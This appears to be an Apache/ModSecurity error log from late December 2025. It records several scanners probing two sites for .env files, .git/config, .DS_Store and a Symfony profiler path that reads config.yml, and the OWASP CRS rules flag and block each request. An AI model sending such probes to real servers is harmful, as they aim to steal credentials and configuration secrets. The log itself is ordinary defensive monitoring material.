[Sun Dec 21 12:58:45.845458 2025] [:error] [pid 881891] [client 158.51.121.183:51898] [client 158.51.121.183] ModSecurity: Warning. Matched phrase "config.yml" at ARGS:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: config.yml found within ARGS:file: app/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUfg9SfNZYuS_k_Dh8s73wAAACI"]
[Sun Dec 21 12:58:45.845958 2025] [:error] [pid 881891] [client 158.51.121.183:51898] [client 158.51.121.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUfg9SfNZYuS_k_Dh8s73wAAACI"]
[Sun Dec 21 12:58:45.846138 2025] [:error] [pid 881891] [client 158.51.121.183:51898] [client 158.51.121.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUfg9SfNZYuS_k_Dh8s73wAAACI"]
[Sun Dec 21 12:58:46.488115 2025] [:error] [pid 881892] [client 158.51.121.183:51900] [client 158.51.121.183] ModSecurity: Warning. Matched phrase "config.yml" at ARGS:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: config.yml found within ARGS:file: app/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUfg9pjatPfNtFuDQSsSMQAAACM"]
[Sun Dec 21 12:58:46.488563 2025] [:error] [pid 881892] [client 158.51.121.183:51900] [client 158.51.121.183] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUfg9pjatPfNtFuDQSsSMQAAACM"]
[Sun Dec 21 12:58:46.488714 2025] [:error] [pid 881892] [client 158.51.121.183:51900] [client 158.51.121.183] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUfg9pjatPfNtFuDQSsSMQAAACM"]
[Sun Dec 21 18:18:14.758638 2025] [:error] [pid 881896] [client 165.227.125.5:36252] [client 165.227.125.5] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUgr1g-fzE1O696L__k1PQAAACc"]
[Sun Dec 21 18:18:14.758903 2025] [:error] [pid 881896] [client 165.227.125.5:36252] [client 165.227.125.5] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUgr1g-fzE1O696L__k1PQAAACc"]
[Sun Dec 21 18:18:14.759079 2025] [:error] [pid 881896] [client 165.227.125.5:36252] [client 165.227.125.5] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUgr1g-fzE1O696L__k1PQAAACc"]
[Mon Dec 22 05:43:01.745487 2025] [authz_core:error] [pid 899028] [client 142.93.143.8:48528] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Dec 22 05:43:04.744914 2025] [:error] [pid 898841] [client 142.93.143.8:35488] [client 142.93.143.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUjMWL_ql2WWYT1u7JVsegAAAAM"]
[Mon Dec 22 05:43:04.745141 2025] [:error] [pid 898841] [client 142.93.143.8:35488] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUjMWL_ql2WWYT1u7JVsegAAAAM"]
[Mon Dec 22 05:43:04.745297 2025] [:error] [pid 898841] [client 142.93.143.8:35488] [client 142.93.143.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUjMWL_ql2WWYT1u7JVsegAAAAM"]
[Mon Dec 22 05:43:05.751639 2025] [:error] [pid 899043] [client 142.93.143.8:35492] [client 142.93.143.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUjMWc8nUtdtekgN728GrQAAAAk"]
[Mon Dec 22 05:43:05.751862 2025] [:error] [pid 899043] [client 142.93.143.8:35492] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUjMWc8nUtdtekgN728GrQAAAAk"]
[Mon Dec 22 05:43:05.752030 2025] [:error] [pid 899043] [client 142.93.143.8:35492] [client 142.93.143.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUjMWc8nUtdtekgN728GrQAAAAk"]
[Mon Dec 22 05:43:07.765622 2025] [:error] [pid 898839] [client 142.93.143.8:35498] [client 142.93.143.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUjMWzKDkNq1wReOgXUQ3gAAAAE"]
[Mon Dec 22 05:43:07.765840 2025] [:error] [pid 898839] [client 142.93.143.8:35498] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUjMWzKDkNq1wReOgXUQ3gAAAAE"]
[Mon Dec 22 05:43:07.765989 2025] [:error] [pid 898839] [client 142.93.143.8:35498] [client 142.93.143.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUjMWzKDkNq1wReOgXUQ3gAAAAE"]
[Mon Dec 22 06:48:10.998665 2025] [authz_core:error] [pid 899043] [client 142.93.143.8:34142] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Dec 22 06:48:13.997934 2025] [:error] [pid 902719] [client 142.93.143.8:43730] [client 142.93.143.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUjbnR6WGa2ZloL8vwm8sAAAAAo"]
[Mon Dec 22 06:48:13.998155 2025] [:error] [pid 902719] [client 142.93.143.8:43730] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUjbnR6WGa2ZloL8vwm8sAAAAAo"]
[Mon Dec 22 06:48:13.998320 2025] [:error] [pid 902719] [client 142.93.143.8:43730] [client 142.93.143.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aUjbnR6WGa2ZloL8vwm8sAAAAAo"]
[Mon Dec 22 06:48:14.989345 2025] [:error] [pid 898845] [client 142.93.143.8:43740] [client 142.93.143.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUjbngAPc6tIWMDQ1VXo_gAAAAU"]
[Mon Dec 22 06:48:14.989592 2025] [:error] [pid 898845] [client 142.93.143.8:43740] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUjbngAPc6tIWMDQ1VXo_gAAAAU"]
[Mon Dec 22 06:48:14.990631 2025] [:error] [pid 898845] [client 142.93.143.8:43740] [client 142.93.143.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aUjbngAPc6tIWMDQ1VXo_gAAAAU"]
[Mon Dec 22 06:48:16.994610 2025] [:error] [pid 898841] [client 142.93.143.8:43750] [client 142.93.143.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUjboL_ql2WWYT1u7JVsiQAAAAM"]
[Mon Dec 22 06:48:16.994857 2025] [:error] [pid 898841] [client 142.93.143.8:43750] [client 142.93.143.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUjboL_ql2WWYT1u7JVsiQAAAAM"]
[Mon Dec 22 06:48:16.995038 2025] [:error] [pid 898841] [client 142.93.143.8:43750] [client 142.93.143.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aUjboL_ql2WWYT1u7JVsiQAAAAM"]
[Mon Dec 22 06:48:25.241606 2025] [authz_core:error] [pid 899038] [client 157.230.19.140:33906] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Dec 22 06:48:28.275033 2025] [:error] [pid 899028] [client 157.230.19.140:33944] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUjbrI1UmSoOhwfDSG0hkQAAAAY"]
[Mon Dec 22 06:48:28.275255 2025] [:error] [pid 899028] [client 157.230.19.140:33944] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUjbrI1UmSoOhwfDSG0hkQAAAAY"]
[Mon Dec 22 06:48:28.275416 2025] [:error] [pid 899028] [client 157.230.19.140:33944] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUjbrI1UmSoOhwfDSG0hkQAAAAY"]
[Mon Dec 22 06:48:29.249803 2025] [:error] [pid 898838] [client 157.230.19.140:33958] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUjbrfr4G77J7RRdTh3xpAAAAAA"]
[Mon Dec 22 06:48:29.250024 2025] [:error] [pid 898838] [client 157.230.19.140:33958] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUjbrfr4G77J7RRdTh3xpAAAAAA"]
[Mon Dec 22 06:48:29.250184 2025] [:error] [pid 898838] [client 157.230.19.140:33958] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUjbrfr4G77J7RRdTh3xpAAAAAA"]
[Mon Dec 22 06:48:31.249364 2025] [:error] [pid 902719] [client 157.230.19.140:33970] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUjbrx6WGa2ZloL8vwm8tAAAAAo"]
[Mon Dec 22 06:48:31.249598 2025] [:error] [pid 902719] [client 157.230.19.140:33970] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUjbrx6WGa2ZloL8vwm8tAAAAAo"]
[Mon Dec 22 06:48:31.249760 2025] [:error] [pid 902719] [client 157.230.19.140:33970] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUjbrx6WGa2ZloL8vwm8tAAAAAo"]
[Mon Dec 22 07:53:30.038882 2025] [authz_core:error] [pid 898841] [client 64.225.75.246:54016] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Mon Dec 22 07:53:33.040490 2025] [:error] [pid 899038] [client 64.225.75.246:54052] [client 64.225.75.246] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUjq7SaFdws1jcQhZ_G3ZAAAAAc"]
[Mon Dec 22 07:53:33.040703 2025] [:error] [pid 899038] [client 64.225.75.246:54052] [client 64.225.75.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUjq7SaFdws1jcQhZ_G3ZAAAAAc"]
[Mon Dec 22 07:53:33.040877 2025] [:error] [pid 899038] [client 64.225.75.246:54052] [client 64.225.75.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUjq7SaFdws1jcQhZ_G3ZAAAAAc"]
